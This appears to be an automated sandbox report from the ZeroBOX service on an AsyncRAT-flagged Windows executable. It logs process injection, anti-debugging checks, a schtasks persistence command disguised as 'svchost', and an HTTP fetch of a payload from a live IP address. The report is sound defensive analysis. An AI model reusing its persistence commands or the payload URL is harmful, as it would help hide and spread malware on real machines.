Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 10, 2021, 8:54 a.m.	April 10, 2021, 9:08 a.m.

Size	11.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`6cf3b3623fc911c37cec7bdcb785ed3a`
SHA256	`770b35e82759eb0107679b50d38f5e40175901c548a5fd8282e116e8d455c418`
CRC32	`63C89FA8`
ssdeep	`192:0whE9u+1nTN+qs9sdmXkC7iQIW1YPhzuHv9il/vhEJ0CTW11lNK:ou+d4qs9z0C7i9hzuHv9ilXh4TS1lN`
PDB Path	C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb
Yara	Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsNET_EXE - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check

eth1.exe "C:\Users\test22\AppData\Local\Temp\eth1.exe"
8212
- Tempmsmp.exe "C:\Users\test22\AppData\Local\Tempmsmp.exe"
  7232
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
    8948
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
      8724
  - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
    8740
  - svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
    4608
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
      7012
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
        5352
    - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
      3468

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
172.217.25.14	Active	Moloch
45.144.225.135	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 10, 2021, 8:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2021, 8:48 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (10 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 10, 2021, 8:54 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:54 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:46 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:46 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:47 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:47 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:47 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:47 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:48 a.m.			0	0
IsDebuggerPresent April 10, 2021, 8:48 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 10, 2021, 8:47 a.m.	buffer: SUCCESS: The scheduled task "svchost" has successfully been created. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW April 10, 2021, 8:47 a.m.	buffer: SUCCESS: The scheduled task "svchost" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 10, 2021, 8:54 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://45.144.225.135/godeth.exe

Performs some HTTP requests (1 event)

request

GET http://45.144.225.135/godeth.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 202 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00415000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00406000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:54 a.m.	process_identifier: 8212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2371000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a0b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002370000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000023e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2372000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2374000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:46 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:47 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 10, 2021, 8:47 a.m.	process_identifier: 7232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
file	C:\Users\test22\AppData\Local\Temp\svchost.exe
file	C:\Users\test22\AppData\Local\Tempmsmp.exe

Creates a suspicious process (5 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Users\test22\AppData\Local\Temp\svchost.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	C:\Users\test22\AppData\Local\Temp\svchost.exe
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Tempmsmp.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 10, 2021, 8:47 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath: cmd	1	1	0
ShellExecuteExW April 10, 2021, 8:47 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath: cmd	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 10, 2021, 8:54 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 10, 2021, 8:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 10, 2021, 8:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (5 events)

url	https://github.com/openwall/john/issues/3454
url	http://www.gnu.org/licenses/
url	http://www.jsonrpc.org/
url	https://pastebin.com
url	https://raw.githubusercontent.com

Yara rule detected in process memory (21 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Perform crypto currency mining	rule	bitcoin
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	APC queue tasks migration	rule	migrate_apc
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 10, 2021, 8:47 a.m.	thread_identifier: 1608 thread_handle: 0x00000000000003fc process_identifier: 4608 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000410	1	1	0
ShellExecuteExW April 10, 2021, 8:47 a.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe	1	1	0

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess April 10, 2021, 8:48 a.m.	status_code: 0xffffffff process_identifier: 8740 process_handle: 0x0000000000000300		0	0
NtTerminateProcess April 10, 2021, 8:48 a.m.	status_code: 0xffffffff process_identifier: 8740 process_handle: 0x0000000000000300	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	45.144.225.135

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 10, 2021, 8:48 a.m.	process_identifier: 7280 region_size: 3645440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001dc	1	0	0

Installs itself for autorun at Windows startup (3 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4608 manipulating memory of non-child process 7280
NtUnmapViewOfSection April 10, 2021, 8:48 a.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 7280 process_handle: 0x00000000000001dc		-1073741799	0
NtAllocateVirtualMemory April 10, 2021, 8:48 a.m.	process_identifier: 7280 region_size: 3645440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001dc	1	0	0

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4608 injected into non-child 7280
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: MZÿÿ¸@(º´ Í!¸LÍ!This program cannot be run in DOS mode. $ò+¯¶èEü¶èEü¶èEü¿Öü èEü½Aý¼èEü½FýµèEü½@ýèEü½Dý°èEüíDý»èEü¶èDüÞêEü.ü·èEü.ü¦èEüpAýêEüp@ý¸èEüpLý¥èEüpEý·èEüpºü·èEü¶èÒü·èEüpGý·èEüRich¶èEüPEdÚe`ð"J øì@ 7:Þ7``À,X¸À,¤70. 7Dq`½)°¾)(½)0` .text÷H J `.rdata¡` ¢N @@.data-Æð,@À.pdata0.¶-@@.nv_fatbH6À/8@/@À.nvFatBi7x6@À.rsrc7z6@@.relocDq 7r6@B base_address: 0x0000000140000000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1	0
WriteProcessMemory April 10, 2021, 8:48 a.m.	buffer: ±CbFÀ/@ base_address: 0x0000000140370000 process_identifier: 7280 process_handle: 0x00000000000001dc	1	1	0
